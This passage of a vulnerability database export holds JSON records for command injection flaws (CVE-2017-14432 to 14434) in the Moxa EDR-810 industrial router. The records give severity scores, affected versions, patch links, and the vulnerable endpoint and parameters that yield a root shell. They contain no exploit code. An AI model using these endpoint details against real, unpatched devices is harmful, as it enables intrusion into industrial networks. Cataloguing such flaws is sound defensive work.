"id": "CNVD-2018-11724"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-105154"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14432"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"date": "2018-05-14T20:29:00.687000",
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-105154"
},
{
"date": "2018-06-15T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14432"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"date": "2022-12-09T01:48:53.673000",
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 In OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
],
"trust": 0.6
}
}
VAR-201805-0138
Vulnerability from variot - Updated: 2023-12-18 12:28An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetwork0= parameter in the "/goform/net_Web_get_value" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0138",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14433"
}
]
},
"cve": "CVE-2017-14433",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-14433",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2018-11723",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-105155",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14433",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14433",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-14433",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11723",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-812",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105155",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"db": "VULHUB",
"id": "VHN-105155"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetwork0= parameter in the \"/goform/net\\_Web\\_get_value\" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"db": "VULHUB",
"id": "VHN-105155"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14433",
"trust": 3.1
},
{
"db": "TALOS",
"id": "TALOS-2017-0482",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-812",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11723",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105155",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"db": "VULHUB",
"id": "VHN-105155"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
]
},
"id": "VAR-201805-0138",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"db": "VULHUB",
"id": "VHN-105155"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11723"
}
]
},
"last_update_date": "2023-12-18T12:28:57.434000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Command Injection Vulnerability (CNVD-2018-11723)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132235"
},
{
"title": "Moxa EDR-810 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190043"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105155"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"db": "NVD",
"id": "CVE-2017-14433"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0482"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14433"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14433"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0482"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"db": "VULHUB",
"id": "VHN-105155"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"db": "VULHUB",
"id": "VHN-105155"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-105155"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"date": "2018-05-14T20:29:00.737000",
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11723"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-105155"
},
{
"date": "2018-07-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013413"
},
{
"date": "2022-12-09T02:08:32.733000",
"db": "NVD",
"id": "CVE-2017-14433"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 In OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013413"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-812"
}
],
"trust": 0.6
}
}
VAR-201805-0139
Vulnerability from variot - Updated: 2023-12-18 12:28An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetmask0= parameter in the "/goform/net_Web_get_value" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0139",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14434"
}
]
},
"cve": "CVE-2017-14434",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-14434",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2018-11733",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-105156",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14434",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14434",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-14434",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11733",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-811",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105156",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-14434",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"db": "VULHUB",
"id": "VHN-105156"
},
{
"db": "VULMON",
"id": "CVE-2017-14434"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-811"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetmask0= parameter in the \"/goform/net\\_Web\\_get_value\" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14434"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013414"
},
{
"db": "CNVD",
"id": "CNVD-2018-11733"
},
{
"db": "VULHUB",
"id": "VHN-105156"
},
{
"db": "VULMON",
"id": "CVE-2017-14434"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14434",
"trust": 3.2
},
{
"db": "TALOS",
"id": "TALOS-2017-0482",
